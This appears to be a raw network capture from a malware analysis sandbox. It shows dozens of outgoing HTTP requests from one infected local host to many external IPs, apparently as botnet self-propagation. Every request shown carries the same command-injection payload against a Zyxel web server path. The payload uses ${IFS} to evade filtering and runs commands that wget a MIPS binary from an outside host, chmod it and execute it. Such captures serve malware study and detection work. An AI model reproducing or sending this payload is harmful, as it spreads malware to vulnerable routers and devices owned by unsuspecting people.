                                            Feb 2, 2024 06:21:10.584692955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3679192.168.2.153545045.184.164.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584709883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3680192.168.2.154105069.5.81.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584750891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3681192.168.2.1553474174.183.242.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584805965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3682192.168.2.1534472145.64.161.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584825993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3683192.168.2.1541748133.130.240.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584825993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3684192.168.2.1559166196.18.172.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584871054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3685192.168.2.154208683.219.179.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584906101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3686192.168.2.1543278103.233.129.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584938049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3687192.168.2.1548058113.176.82.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.584980965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3688192.168.2.1558012158.186.109.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585021019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3689192.168.2.154864058.6.203.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585057020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3690192.168.2.154950645.115.157.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585091114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3691192.168.2.1538348124.157.87.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585149050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3692192.168.2.15521409.161.42.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585181952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3693192.168.2.1552448158.129.47.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585216999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3694192.168.2.155522223.107.71.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585267067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3695192.168.2.155509480.138.224.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585302114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3696192.168.2.1552304186.43.106.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585330009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3697192.168.2.1536914136.238.207.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585385084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3698192.168.2.155648251.253.192.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585411072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3699192.168.2.1540576126.88.154.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585465908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3700192.168.2.1537502196.11.42.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585498095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3701192.168.2.1548720150.115.16.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585537910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3702192.168.2.1539380196.156.217.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585572958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3703192.168.2.154032879.197.187.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585604906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3704192.168.2.154347634.201.135.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585663080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3705192.168.2.1541658102.125.238.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585692883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3706192.168.2.1535294145.191.45.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585738897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3707192.168.2.154714247.127.218.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585783958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3708192.168.2.1550010135.162.0.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585818052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3709192.168.2.1547304179.79.221.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585834980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3710192.168.2.1553350170.35.75.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585869074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3711192.168.2.154031424.200.129.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585913897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3712192.168.2.155437046.54.166.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.585937977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3713192.168.2.155073274.72.64.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586004019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3714192.168.2.1534638100.155.119.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586020947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3715192.168.2.155688447.17.155.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586076975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3716192.168.2.155963044.117.207.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586111069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3717192.168.2.153359490.68.186.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586157084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3718192.168.2.155200661.214.104.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586179018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3719192.168.2.1536582130.117.168.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586211920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3720192.168.2.1558158195.56.7.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586247921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3721192.168.2.1533442218.87.31.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586297035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3722192.168.2.1551030187.131.135.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586313009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3723192.168.2.155386298.98.79.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586363077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3724192.168.2.155086460.36.70.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586417913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3725192.168.2.153938869.86.232.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586445093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3726192.168.2.1538808114.10.101.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586460114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3727192.168.2.1552204143.179.106.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586498022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3728192.168.2.155282269.68.135.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586534023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3729192.168.2.1541654114.117.186.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586555958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3730192.168.2.154972039.197.242.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586601973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3731192.168.2.154753068.41.179.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586636066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3732192.168.2.1535716101.145.239.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586672068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3733192.168.2.1559450213.214.18.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586735010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3734192.168.2.1553204159.178.214.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586764097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3735192.168.2.154767298.181.200.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586798906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3736192.168.2.1542022134.186.149.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586828947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3737192.168.2.1557956217.104.146.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586850882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3738192.168.2.154575613.109.170.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586899996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3739192.168.2.154322094.183.92.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586941957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3740192.168.2.1539150106.143.172.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.586982965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3741192.168.2.154466498.191.57.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.587018013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3742192.168.2.154292438.201.148.70443
                                            TimestampBytes transferredDirectionData
